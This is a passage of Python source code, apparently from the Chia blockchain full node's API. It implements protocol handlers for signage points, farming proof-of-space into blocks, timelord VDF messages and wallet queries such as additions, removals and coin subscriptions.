# Otherwise (we have the prev or the end of sub slot), request it normally
full_node_request = full_node_protocol.RequestSignagePointOrEndOfSubSlot(
new_sp.challenge_hash, new_sp.index_from_challenge, new_sp.last_rc_infusion
)
return make_msg(ProtocolMessageTypes.request_signage_point_or_end_of_sub_slot, full_node_request)
@api_request
@reply_type([ProtocolMessageTypes.respond_signage_point, ProtocolMessageTypes.respond_end_of_sub_slot])
async def request_signage_point_or_end_of_sub_slot(
self, request: full_node_protocol.RequestSignagePointOrEndOfSubSlot
) -> Optional[Message]:
if request.index_from_challenge == 0:
sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = self.full_node.full_node_store.get_sub_slot(
request.challenge_hash
)
if sub_slot is not None:
return make_msg(
ProtocolMessageTypes.respond_end_of_sub_slot,
full_node_protocol.RespondEndOfSubSlot(sub_slot[0]),
)
else:
if self.full_node.full_node_store.get_sub_slot(request.challenge_hash) is None:
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
self.log.info(f"Don't have challenge hash {request.challenge_hash}")
sp: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point_by_index(
request.challenge_hash,
request.index_from_challenge,
request.last_rc_infusion,
)
if sp is not None:
assert (
sp.cc_vdf is not None
and sp.cc_proof is not None
and sp.rc_vdf is not None
and sp.rc_proof is not None
)
full_node_response = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
sp.cc_vdf,
sp.cc_proof,
sp.rc_vdf,
sp.rc_proof,
)
return make_msg(ProtocolMessageTypes.respond_signage_point, full_node_response)
else:
self.log.info(f"Don't have signage point {request}")
return None
@peer_required
@api_request
async def respond_signage_point(
self, request: full_node_protocol.RespondSignagePoint, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
# Already have signage point
if self.full_node.full_node_store.have_newer_signage_point(
request.challenge_chain_vdf.challenge,
request.index_from_challenge,
request.reward_chain_vdf.challenge,
):
return None
existing_sp = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_vdf.output.get_hash()
)
if existing_sp is not None and existing_sp.rc_vdf == request.reward_chain_vdf:
return None
peak = self.full_node.blockchain.get_peak()
if peak is not None and peak.height > self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
next_sub_slot_iters = self.full_node.blockchain.get_next_slot_iters(peak.header_hash, True)
sub_slots_for_peak = await self.full_node.blockchain.get_sp_and_ip_sub_slots(peak.header_hash)
assert sub_slots_for_peak is not None
ip_sub_slot: Optional[EndOfSubSlotBundle] = sub_slots_for_peak[1]
else:
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
next_sub_slot_iters = sub_slot_iters
ip_sub_slot = None
added = self.full_node.full_node_store.new_signage_point(
request.index_from_challenge,
self.full_node.blockchain,
self.full_node.blockchain.get_peak(),
next_sub_slot_iters,
SignagePoint(
request.challenge_chain_vdf,
request.challenge_chain_proof,
request.reward_chain_vdf,
request.reward_chain_proof,
),
)
if added:
await self.full_node.signage_point_post_processing(request, peer, ip_sub_slot)
else:
self.log.debug(
f"Signage point {request.index_from_challenge} not added, CC challenge: "
f"{request.challenge_chain_vdf.challenge}, RC challenge: {request.reward_chain_vdf.challenge}"
)
return None
@peer_required
@api_request
async def respond_end_of_sub_slot(
self, request: full_node_protocol.RespondEndOfSubSlot, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
msg, _ = await self.full_node.respond_end_of_sub_slot(request, peer)
return msg
@peer_required
@api_request
async def request_mempool_transactions(
self,
request: full_node_protocol.RequestMempoolTransactions,
peer: ws.WSChiaConnection,
) -> Optional[Message]:
received_filter = PyBIP158(bytearray(request.filter))
items: List[MempoolItem] = await self.full_node.mempool_manager.get_items_not_in_filter(received_filter)
for item in items:
transaction = full_node_protocol.RespondTransaction(item.spend_bundle)
msg = make_msg(ProtocolMessageTypes.respond_transaction, transaction)
await peer.send_message(msg)
return None
# FARMER PROTOCOL
@api_request
@peer_required
async def declare_proof_of_space(
self, request: farmer_protocol.DeclareProofOfSpace, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Creates a block body and header, with the proof of space, coinbase, and fee targets provided
by the farmer, and sends the hash of the header data back to the farmer.
"""
if self.full_node.sync_store.get_sync_mode():
return None
async with self.full_node.timelord_lock:
sp_vdfs: Optional[SignagePoint] = self.full_node.full_node_store.get_signage_point(
request.challenge_chain_sp
)
if sp_vdfs is None:
self.log.warning(f"Received proof of space for an unknown signage point {request.challenge_chain_sp}")
return None
if request.signage_point_index > 0:
assert sp_vdfs.rc_vdf is not None
if sp_vdfs.rc_vdf.output.get_hash() != request.reward_chain_sp:
self.log.debug(
f"Received proof of space for a potentially old signage point {request.challenge_chain_sp}. "
f"Current sp: {sp_vdfs.rc_vdf.output.get_hash()}"
)
return None
if request.signage_point_index == 0:
cc_challenge_hash: bytes32 = request.challenge_chain_sp
else:
assert sp_vdfs.cc_vdf is not None
cc_challenge_hash = sp_vdfs.cc_vdf.challenge
pos_sub_slot: Optional[Tuple[EndOfSubSlotBundle, int, uint128]] = None
if request.challenge_hash != self.full_node.constants.GENESIS_CHALLENGE:
# Checks that the proof of space is a response to a recent challenge and valid SP
pos_sub_slot = self.full_node.full_node_store.get_sub_slot(cc_challenge_hash)
if pos_sub_slot is None:
self.log.warning(f"Received proof of space for an unknown sub slot: {request}")
return None
total_iters_pos_slot: uint128 = pos_sub_slot[2]
else:
total_iters_pos_slot = uint128(0)
assert cc_challenge_hash == request.challenge_hash
# Now we know that the proof of space has a signage point either:
# 1. In the previous sub-slot of the peak (overflow)
# 2. In the same sub-slot as the peak
# 3. In a future sub-slot that we already know of
# Checks that the proof of space is valid
quality_string: Optional[bytes32] = request.proof_of_space.verify_and_get_quality_string(
self.full_node.constants, cc_challenge_hash, request.challenge_chain_sp
)
assert quality_string is not None and len(quality_string) == 32
# Grab best transactions from Mempool for given tip target
aggregate_signature: G2Element = G2Element()
block_generator: Optional[BlockGenerator] = None
additions: Optional[List[Coin]] = []
removals: Optional[List[Coin]] = []
async with self.full_node._blockchain_lock_high_priority:
peak: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
if peak is not None:
# Finds the last transaction block before this one
curr_l_tb: BlockRecord = peak
while not curr_l_tb.is_transaction_block:
curr_l_tb = self.full_node.blockchain.block_record(curr_l_tb.prev_hash)
try:
mempool_bundle = await self.full_node.mempool_manager.create_bundle_from_mempool(
curr_l_tb.header_hash
)
except Exception as e:
self.log.error(f"Traceback: {traceback.format_exc()}")
self.full_node.log.error(f"Error making spend bundle {e} peak: {peak}")
mempool_bundle = None
if mempool_bundle is not None:
spend_bundle = mempool_bundle[0]
additions = mempool_bundle[1]
removals = mempool_bundle[2]
self.full_node.log.info(f"Add rem: {len(additions)} {len(removals)}")
aggregate_signature = spend_bundle.aggregated_signature
if self.full_node.full_node_store.previous_generator is not None:
self.log.info(
f"Using previous generator for height "
f"{self.full_node.full_node_store.previous_generator}"
)
block_generator = best_solution_generator_from_template(
self.full_node.full_node_store.previous_generator, spend_bundle
)
else:
block_generator = simple_solution_generator(spend_bundle)
def get_plot_sig(to_sign, _) -> G2Element:
if to_sign == request.challenge_chain_sp:
return request.challenge_chain_sp_signature
elif to_sign == request.reward_chain_sp:
return request.reward_chain_sp_signature
return G2Element()
def get_pool_sig(_1, _2) -> Optional[G2Element]:
return request.pool_signature
prev_b: Optional[BlockRecord] = self.full_node.blockchain.get_peak()
# Finds the previous block from the signage point, ensuring that the reward chain VDF is correct
if prev_b is not None:
if request.signage_point_index == 0:
if pos_sub_slot is None:
self.log.warning("Pos sub slot is None")
return None
rc_challenge = pos_sub_slot[0].reward_chain.end_of_slot_vdf.challenge
else:
assert sp_vdfs.rc_vdf is not None
rc_challenge = sp_vdfs.rc_vdf.challenge
# Backtrack through empty sub-slots
for eos, _, _ in reversed(self.full_node.full_node_store.finished_sub_slots):
if eos is not None and eos.reward_chain.get_hash() == rc_challenge:
rc_challenge = eos.reward_chain.end_of_slot_vdf.challenge
found = False
attempts = 0
while prev_b is not None and attempts < 10:
if prev_b.reward_infusion_new_challenge == rc_challenge:
found = True
break
if prev_b.finished_reward_slot_hashes is not None and len(prev_b.finished_reward_slot_hashes) > 0:
if prev_b.finished_reward_slot_hashes[-1] == rc_challenge:
# This block includes a sub-slot which is where our SP vdf starts. Go back one more
# to find the prev block
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
found = True
break
prev_b = self.full_node.blockchain.try_block_record(prev_b.prev_hash)
attempts += 1
if not found:
self.log.warning("Did not find a previous block with the correct reward chain hash")
return None
try:
finished_sub_slots: Optional[
List[EndOfSubSlotBundle]
] = self.full_node.full_node_store.get_finished_sub_slots(
self.full_node.blockchain, prev_b, cc_challenge_hash
)
if finished_sub_slots is None:
return None
if (
len(finished_sub_slots) > 0
and pos_sub_slot is not None
and finished_sub_slots[-1] != pos_sub_slot[0]
):
self.log.error("Have different sub-slots than is required to farm this block")
return None
except ValueError as e:
self.log.warning(f"Value Error: {e}")
return None
if prev_b is None:
pool_target = PoolTarget(
self.full_node.constants.GENESIS_PRE_FARM_POOL_PUZZLE_HASH,
uint32(0),
)
farmer_ph = self.full_node.constants.GENESIS_PRE_FARM_FARMER_PUZZLE_HASH
else:
farmer_ph = request.farmer_puzzle_hash
if request.proof_of_space.pool_contract_puzzle_hash is not None:
pool_target = PoolTarget(request.proof_of_space.pool_contract_puzzle_hash, uint32(0))
else:
assert request.pool_target is not None
pool_target = request.pool_target
if peak is None or peak.height <= self.full_node.constants.MAX_SUB_SLOT_BLOCKS:
difficulty = self.full_node.constants.DIFFICULTY_STARTING
sub_slot_iters = self.full_node.constants.SUB_SLOT_ITERS_STARTING
else:
difficulty = uint64(peak.weight - self.full_node.blockchain.block_record(peak.prev_hash).weight)
sub_slot_iters = peak.sub_slot_iters
for sub_slot in finished_sub_slots:
if sub_slot.challenge_chain.new_difficulty is not None:
difficulty = sub_slot.challenge_chain.new_difficulty
if sub_slot.challenge_chain.new_sub_slot_iters is not None:
sub_slot_iters = sub_slot.challenge_chain.new_sub_slot_iters
required_iters: uint64 = calculate_iterations_quality(
self.full_node.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_string,
request.proof_of_space.size,
difficulty,
request.challenge_chain_sp,
)
sp_iters: uint64 = calculate_sp_iters(self.full_node.constants, sub_slot_iters, request.signage_point_index)
ip_iters: uint64 = calculate_ip_iters(
self.full_node.constants,
sub_slot_iters,
request.signage_point_index,
required_iters,
)
# The block's timestamp must be greater than the previous transaction block's timestamp
timestamp = uint64(int(time.time()))
curr: Optional[BlockRecord] = prev_b
while curr is not None and not curr.is_transaction_block and curr.height != 0:
curr = self.full_node.blockchain.try_block_record(curr.prev_hash)
if curr is not None:
assert curr.timestamp is not None
if timestamp <= curr.timestamp:
timestamp = uint64(int(curr.timestamp + 1))
self.log.info("Starting to make the unfinished block")
unfinished_block: UnfinishedBlock = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
block_generator,
aggregate_signature,
additions,
removals,
prev_b,
finished_sub_slots,
)
self.log.info("Made the unfinished block")
if prev_b is not None:
height: uint32 = uint32(prev_b.height + 1)
else:
height = uint32(0)
self.full_node.full_node_store.add_candidate_block(quality_string, height, unfinished_block)
foliage_sb_data_hash = unfinished_block.foliage.foliage_block_data.get_hash()
if unfinished_block.is_transaction_block():
foliage_transaction_block_hash = unfinished_block.foliage.foliage_transaction_block_hash
else:
foliage_transaction_block_hash = bytes32([0] * 32)
assert foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
quality_string,
foliage_sb_data_hash,
foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
# Adds backup in case the first one fails
if unfinished_block.is_transaction_block() and unfinished_block.transactions_generator is not None:
unfinished_block_backup = create_unfinished_block(
self.full_node.constants,
total_iters_pos_slot,
sub_slot_iters,
request.signage_point_index,
sp_iters,
ip_iters,
request.proof_of_space,
cc_challenge_hash,
farmer_ph,
pool_target,
get_plot_sig,
get_pool_sig,
sp_vdfs,
timestamp,
self.full_node.blockchain,
b"",
None,
G2Element(),
None,
None,
prev_b,
finished_sub_slots,
)
self.full_node.full_node_store.add_candidate_block(
quality_string, height, unfinished_block_backup, backup=True
)
return None
@api_request
@peer_required
async def signed_values(
self, farmer_request: farmer_protocol.SignedValues, peer: ws.WSChiaConnection
) -> Optional[Message]:
"""
Signature of header hash, by the harvester. This is enough to create an unfinished
block, which only needs a Proof of Time to be finished. If the signature is valid,
we call the unfinished_block routine.
"""
candidate_tuple: Optional[Tuple[uint32, UnfinishedBlock]] = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string
)
if candidate_tuple is None:
self.log.warning(f"Quality string {farmer_request.quality_string} not found in database")
return None
height, candidate = candidate_tuple
if not AugSchemeMPL.verify(
candidate.reward_chain_block.proof_of_space.plot_public_key,
candidate.foliage.foliage_block_data.get_hash(),
farmer_request.foliage_block_data_signature,
):
self.log.warning("Signature not valid. There might be a collision in plots. Ignore this during tests.")
return None
fsb2 = dataclasses.replace(
candidate.foliage,
foliage_block_data_signature=farmer_request.foliage_block_data_signature,
)
if candidate.is_transaction_block():
fsb2 = dataclasses.replace(
fsb2, foliage_transaction_block_signature=farmer_request.foliage_transaction_block_signature
)
new_candidate = dataclasses.replace(candidate, foliage=fsb2)
if not self.full_node.has_valid_pool_sig(new_candidate):
self.log.warning("Trying to make a pre-farm block but height is not 0")
return None
# Propagate to ourselves (which validates and does further propagations)
request = full_node_protocol.RespondUnfinishedBlock(new_candidate)
try:
await self.full_node.respond_unfinished_block(request, None, True)
except Exception as e:
# If we have an error with this block, try making an empty block
self.full_node.log.error(f"Error farming block {e} {request}")
candidate_tuple = self.full_node.full_node_store.get_candidate_block(
farmer_request.quality_string, backup=True
)
if candidate_tuple is not None:
height, unfinished_block = candidate_tuple
self.full_node.full_node_store.add_candidate_block(
farmer_request.quality_string, height, unfinished_block, False
)
# All unfinished blocks that we create will have the foliage transaction block and hash
assert unfinished_block.foliage.foliage_transaction_block_hash is not None
message = farmer_protocol.RequestSignedValues(
farmer_request.quality_string,
unfinished_block.foliage.foliage_block_data.get_hash(),
unfinished_block.foliage.foliage_transaction_block_hash,
)
await peer.send_message(make_msg(ProtocolMessageTypes.request_signed_values, message))
return None
# TIMELORD PROTOCOL
@peer_required
@api_request
async def new_infusion_point_vdf(
self, request: timelord_protocol.NewInfusionPointVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
# Lookup unfinished blocks
async with self.full_node.timelord_lock:
return await self.full_node.new_infusion_point_vdf(request, peer)
@peer_required
@api_request
async def new_signage_point_vdf(
self, request: timelord_protocol.NewSignagePointVDF, peer: ws.WSChiaConnection
) -> None:
if self.full_node.sync_store.get_sync_mode():
return None
full_node_message = full_node_protocol.RespondSignagePoint(
request.index_from_challenge,
request.challenge_chain_sp_vdf,
request.challenge_chain_sp_proof,
request.reward_chain_sp_vdf,
request.reward_chain_sp_proof,
)
await self.respond_signage_point(full_node_message, peer)
@peer_required
@api_request
async def new_end_of_sub_slot_vdf(
self, request: timelord_protocol.NewEndOfSubSlotVDF, peer: ws.WSChiaConnection
) -> Optional[Message]:
if self.full_node.sync_store.get_sync_mode():
return None
if (
self.full_node.full_node_store.get_sub_slot(request.end_of_sub_slot_bundle.challenge_chain.get_hash())
is not None
):
return None
# Calls our own internal message to handle the end of sub slot, and potentially broadcasts to other peers.
full_node_message = full_node_protocol.RespondEndOfSubSlot(request.end_of_sub_slot_bundle)
msg, added = await self.full_node.respond_end_of_sub_slot(full_node_message, peer)
if not added:
self.log.error(
f"Was not able to add end of sub-slot: "
f"{request.end_of_sub_slot_bundle.challenge_chain.challenge_chain_end_of_slot_vdf.challenge}. "
f"Re-sending new-peak to timelord"
)
await self.full_node.send_peak_to_timelords(peer=peer)
return None
else:
return msg
@api_request
async def request_block_header(self, request: wallet_protocol.RequestBlockHeader) -> Optional[Message]:
header_hash = self.full_node.blockchain.height_to_hash(request.height)
if header_hash is None:
msg = make_msg(ProtocolMessageTypes.reject_header_request, RejectHeaderRequest(request.height))
return msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is not None:
tx_removals, tx_additions, _ = await self.full_node.blockchain.get_tx_removals_and_additions(block)
header_block = get_block_header(block, tx_additions, tx_removals)
msg = make_msg(
ProtocolMessageTypes.respond_block_header,
wallet_protocol.RespondBlockHeader(header_block),
)
return msg
return None
@api_request
async def request_additions(self, request: wallet_protocol.RequestAdditions) -> Optional[Message]:
if request.header_hash is None:
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(request.height)
else:
header_hash = request.header_hash
if header_hash is None:
raise ValueError(f"Block at height {request.height} not found")
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
# We lock so that the coin store does not get modified
if (
block is None
or block.is_transaction_block() is False
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectAdditionsRequest(request.height, header_hash)
msg = make_msg(ProtocolMessageTypes.reject_additions_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
additions = await self.full_node.coin_store.get_coins_added_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
puzzlehash_coins_map: Dict[bytes32, List[Coin]] = {}
for coin_record in additions:
if coin_record.coin.puzzle_hash in puzzlehash_coins_map:
puzzlehash_coins_map[coin_record.coin.puzzle_hash].append(coin_record.coin)
else:
puzzlehash_coins_map[coin_record.coin.puzzle_hash] = [coin_record.coin]
coins_map: List[Tuple[bytes32, List[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes, Optional[bytes]]] = []
if request.puzzle_hashes is None:
for puzzle_hash, coins in puzzlehash_coins_map.items():
coins_map.append((puzzle_hash, coins))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, None)
else:
# Create addition Merkle set
addition_merkle_set = MerkleSet()
# Addition Merkle set contains puzzlehash and hash of all coins with that puzzlehash
for puzzle, coins in puzzlehash_coins_map.items():
addition_merkle_set.add_already_hashed(puzzle)
addition_merkle_set.add_already_hashed(hash_coin_list(coins))
assert addition_merkle_set.get_root() == block.foliage_transaction_block.additions_root
for puzzle_hash in request.puzzle_hashes:
result, proof = addition_merkle_set.is_included_already_hashed(puzzle_hash)
if puzzle_hash in puzzlehash_coins_map:
coins_map.append((puzzle_hash, puzzlehash_coins_map[puzzle_hash]))
hash_coin_str = hash_coin_list(puzzlehash_coins_map[puzzle_hash])
result_2, proof_2 = addition_merkle_set.is_included_already_hashed(hash_coin_str)
assert result
assert result_2
proofs_map.append((puzzle_hash, proof, proof_2))
else:
coins_map.append((puzzle_hash, []))
assert not result
proofs_map.append((puzzle_hash, proof, None))
response = wallet_protocol.RespondAdditions(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_additions, response)
return msg
@api_request
async def request_removals(self, request: wallet_protocol.RequestRemovals) -> Optional[Message]:
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(request.header_hash)
# We lock so that the coin store does not get modified
peak_height = self.full_node.blockchain.get_peak_height()
if (
block is None
or block.is_transaction_block() is False
or block.height != request.height
or (peak_height is not None and block.height > peak_height)
or self.full_node.blockchain.height_to_hash(block.height) != request.header_hash
):
reject = wallet_protocol.RejectRemovalsRequest(request.height, request.header_hash)
msg = make_msg(ProtocolMessageTypes.reject_removals_request, reject)
return msg
assert block is not None and block.foliage_transaction_block is not None
# Note: this might return bad data if there is a reorg in this time
all_removals: List[CoinRecord] = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
if self.full_node.blockchain.height_to_hash(block.height) != request.header_hash:
raise ValueError(f"Block {block.header_hash} no longer in chain")
all_removals_dict: Dict[bytes32, Coin] = {}
for coin_record in all_removals:
all_removals_dict[coin_record.coin.name()] = coin_record.coin
coins_map: List[Tuple[bytes32, Optional[Coin]]] = []
proofs_map: List[Tuple[bytes32, bytes]] = []
# If there are no transactions, respond with empty lists
if block.transactions_generator is None:
proofs: Optional[List]
if request.coin_names is None:
proofs = None
else:
proofs = []
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, [], proofs)
elif request.coin_names is None or len(request.coin_names) == 0:
for removed_name, removed_coin in all_removals_dict.items():
coins_map.append((removed_name, removed_coin))
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, None)
else:
assert block.transactions_generator
removal_merkle_set = MerkleSet()
for removed_name, removed_coin in all_removals_dict.items():
removal_merkle_set.add_already_hashed(removed_name)
assert removal_merkle_set.get_root() == block.foliage_transaction_block.removals_root
for coin_name in request.coin_names:
result, proof = removal_merkle_set.is_included_already_hashed(coin_name)
proofs_map.append((coin_name, proof))
if coin_name in all_removals_dict:
removed_coin = all_removals_dict[coin_name]
coins_map.append((coin_name, removed_coin))
assert result
else:
coins_map.append((coin_name, None))
assert not result
response = wallet_protocol.RespondRemovals(block.height, block.header_hash, coins_map, proofs_map)
msg = make_msg(ProtocolMessageTypes.respond_removals, response)
return msg
@api_request
async def send_transaction(self, request: wallet_protocol.SendTransaction, *, test=False) -> Optional[Message]:
spend_name = request.transaction.name()
await self.full_node.transaction_queue.put(
(0, TransactionQueueEntry(request.transaction, None, spend_name, None, test))
)
# Waits for the transaction to go into the mempool, times out after 45 seconds.
status, error = None, None
sleep_time = 0.01
for i in range(int(45 / sleep_time)):
await asyncio.sleep(sleep_time)
for potential_name, potential_status, potential_error in self.full_node.transaction_responses:
if spend_name == potential_name:
status = potential_status
error = potential_error
break
if status is not None:
break
if status is None:
response = wallet_protocol.TransactionAck(spend_name, uint8(MempoolInclusionStatus.PENDING), None)
else:
error_name = error.name if error is not None else None
if status == MempoolInclusionStatus.SUCCESS:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
else:
# If if failed/pending, but it previously succeeded (in mempool), this is idempotence, return SUCCESS
if self.full_node.mempool_manager.get_spendbundle(spend_name) is not None:
response = wallet_protocol.TransactionAck(
spend_name, uint8(MempoolInclusionStatus.SUCCESS.value), None
)
else:
response = wallet_protocol.TransactionAck(spend_name, uint8(status.value), error_name)
msg = make_msg(ProtocolMessageTypes.transaction_ack, response)
return msg
@api_request
async def request_puzzle_solution(self, request: wallet_protocol.RequestPuzzleSolution) -> Optional[Message]:
coin_name = request.coin_name
height = request.height
coin_record = await self.full_node.coin_store.get_coin_record(coin_name)
reject = wallet_protocol.RejectPuzzleSolution(coin_name, height)
reject_msg = make_msg(ProtocolMessageTypes.reject_puzzle_solution, reject)
if coin_record is None or coin_record.spent_block_index != height:
return reject_msg
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(height)
if header_hash is None:
return reject_msg
block: Optional[FullBlock] = await self.full_node.block_store.get_full_block(header_hash)
if block is None or block.transactions_generator is None:
return reject_msg
block_generator: Optional[BlockGenerator] = await self.full_node.blockchain.get_block_generator(block)
assert block_generator is not None
error, puzzle, solution = get_puzzle_and_solution_for_coin(
block_generator, coin_name, self.full_node.constants.MAX_BLOCK_COST_CLVM
)
if error is not None:
return reject_msg
pz = Program.to(puzzle)
sol = Program.to(solution)
wrapper = PuzzleSolutionResponse(coin_name, height, pz, sol)
response = wallet_protocol.RespondPuzzleSolution(wrapper)
response_msg = make_msg(ProtocolMessageTypes.respond_puzzle_solution, response)
return response_msg
@api_request
async def request_header_blocks(self, request: wallet_protocol.RequestHeaderBlocks) -> Optional[Message]:
if request.end_height < request.start_height or request.end_height - request.start_height > 32:
return None
header_hashes: List[bytes32] = []
for i in range(request.start_height, request.end_height + 1):
header_hash: Optional[bytes32] = self.full_node.blockchain.height_to_hash(uint32(i))
if header_hash is None:
reject = RejectHeaderBlocks(request.start_height, request.end_height)
msg = make_msg(ProtocolMessageTypes.reject_header_blocks, reject)
return msg
header_hashes.append(header_hash)
blocks: List[FullBlock] = await self.full_node.block_store.get_blocks_by_hash(header_hashes)
header_blocks = []
for block in blocks:
added_coins_records = await self.full_node.coin_store.get_coins_added_at_height(block.height)
removed_coins_records = await self.full_node.coin_store.get_coins_removed_at_height(block.height)
added_coins = [record.coin for record in added_coins_records if not record.coinbase]
removal_names = [record.coin.name() for record in removed_coins_records]
header_block = get_block_header(block, added_coins, removal_names)
header_blocks.append(header_block)
msg = make_msg(
ProtocolMessageTypes.respond_header_blocks,
wallet_protocol.RespondHeaderBlocks(request.start_height, request.end_height, header_blocks),
)
return msg
@api_request
async def respond_compact_proof_of_time(self, request: timelord_protocol.RespondCompactProofOfTime):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_proof_of_time(request)
@execute_task
@peer_required
@api_request
@bytes_required
async def new_compact_vdf(
self, request: full_node_protocol.NewCompactVDF, peer: ws.WSChiaConnection, request_bytes: bytes = b""
):
if self.full_node.sync_store.get_sync_mode():
return None
if len(self.full_node.compact_vdf_sem._waiters) > 20:
self.log.debug(f"Ignoring NewCompactVDF: {request}, _waiters")
return
name = std_hash(request_bytes)
if name in self.full_node.compact_vdf_requests:
self.log.debug(f"Ignoring NewCompactVDF: {request}, already requested")
return
self.full_node.compact_vdf_requests.add(name)
# this semaphore will only allow a limited number of tasks call
# new_compact_vdf() at a time, since it can be expensive
async with self.full_node.compact_vdf_sem:
try:
await self.full_node.new_compact_vdf(request, peer)
finally:
self.full_node.compact_vdf_requests.remove(name)
@peer_required
@api_request
@reply_type([ProtocolMessageTypes.respond_compact_vdf])
async def request_compact_vdf(self, request: full_node_protocol.RequestCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.request_compact_vdf(request, peer)
@peer_required
@api_request
async def respond_compact_vdf(self, request: full_node_protocol.RespondCompactVDF, peer: ws.WSChiaConnection):
if self.full_node.sync_store.get_sync_mode():
return None
await self.full_node.respond_compact_vdf(request, peer)
@peer_required
@api_request
async def register_interest_in_puzzle_hash(
self, request: wallet_protocol.RegisterForPhUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_puzzle_hash:
self.full_node.peer_puzzle_hash[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
hint_coin_ids = []
# Add peer to the "Subscribed" dictionary
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for puzzle_hash in request.puzzle_hashes:
ph_hint_coins = await self.full_node.hint_store.get_coin_ids(puzzle_hash)
hint_coin_ids.extend(ph_hint_coins)
if puzzle_hash not in self.full_node.ph_subscriptions:
self.full_node.ph_subscriptions[puzzle_hash] = set()
if (
peer.peer_node_id not in self.full_node.ph_subscriptions[puzzle_hash]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.ph_subscriptions[puzzle_hash].add(peer.peer_node_id)
self.full_node.peer_puzzle_hash[peer.peer_node_id].add(puzzle_hash)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
# Send all coins with requested puzzle hash that have been created after the specified height
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_puzzle_hashes(
include_spent_coins=True, puzzle_hashes=request.puzzle_hashes, min_height=request.min_height
)
if len(hint_coin_ids) > 0:
hint_states = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=hint_coin_ids, min_height=request.min_height
)
states.extend(hint_states)
response = wallet_protocol.RespondToPhUpdates(request.puzzle_hashes, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_ph_update, response)
return msg
@peer_required
@api_request
async def register_interest_in_coin(
self, request: wallet_protocol.RegisterForCoinUpdates, peer: ws.WSChiaConnection
):
if peer.peer_node_id not in self.full_node.peer_coin_ids:
self.full_node.peer_coin_ids[peer.peer_node_id] = set()
if peer.peer_node_id not in self.full_node.peer_sub_counter:
self.full_node.peer_sub_counter[peer.peer_node_id] = 0
max_items = self.full_node.config.get("max_subscribe_items", 200000)
for coin_id in request.coin_ids:
if coin_id not in self.full_node.coin_subscriptions:
self.full_node.coin_subscriptions[coin_id] = set()
if (
peer.peer_node_id not in self.full_node.coin_subscriptions[coin_id]
and self.full_node.peer_sub_counter[peer.peer_node_id] < max_items
):
self.full_node.coin_subscriptions[coin_id].add(peer.peer_node_id)
self.full_node.peer_coin_ids[peer.peer_node_id].add(coin_id)
self.full_node.peer_sub_counter[peer.peer_node_id] += 1
states: List[CoinState] = await self.full_node.coin_store.get_coin_states_by_ids(
include_spent_coins=True, coin_ids=request.coin_ids, min_height=request.min_height
)
response = wallet_protocol.RespondToCoinUpdates(request.coin_ids, request.min_height, states)
msg = make_msg(ProtocolMessageTypes.respond_to_coin_update, response)
return msg
@api_request
async def request_children(self, request: wallet_protocol.RequestChildren) -> Optional[Message]:
coin_records: List[CoinRecord] = await self.full_node.coin_store.get_coin_records_by_parent_ids(
True, [request.coin_name]
)
states = [record.coin_state for record in coin_records]
response = wallet_protocol.RespondChildren(states)
msg = make_msg(ProtocolMessageTypes.respond_children, response)
return msg
@api_request
async def request_ses_hashes(self, request: wallet_protocol.RequestSESInfo):
"""Returns the start and end height of a sub-epoch for the height specified in request"""
ses_height = self.full_node.blockchain.get_ses_heights()
start_height = request.start_height
end_height = request.end_height
ses_hash_heights = []
ses_reward_hashes = []
for idx, ses_start_height in enumerate(ses_height):
if idx == len(ses_height) - 1:
break
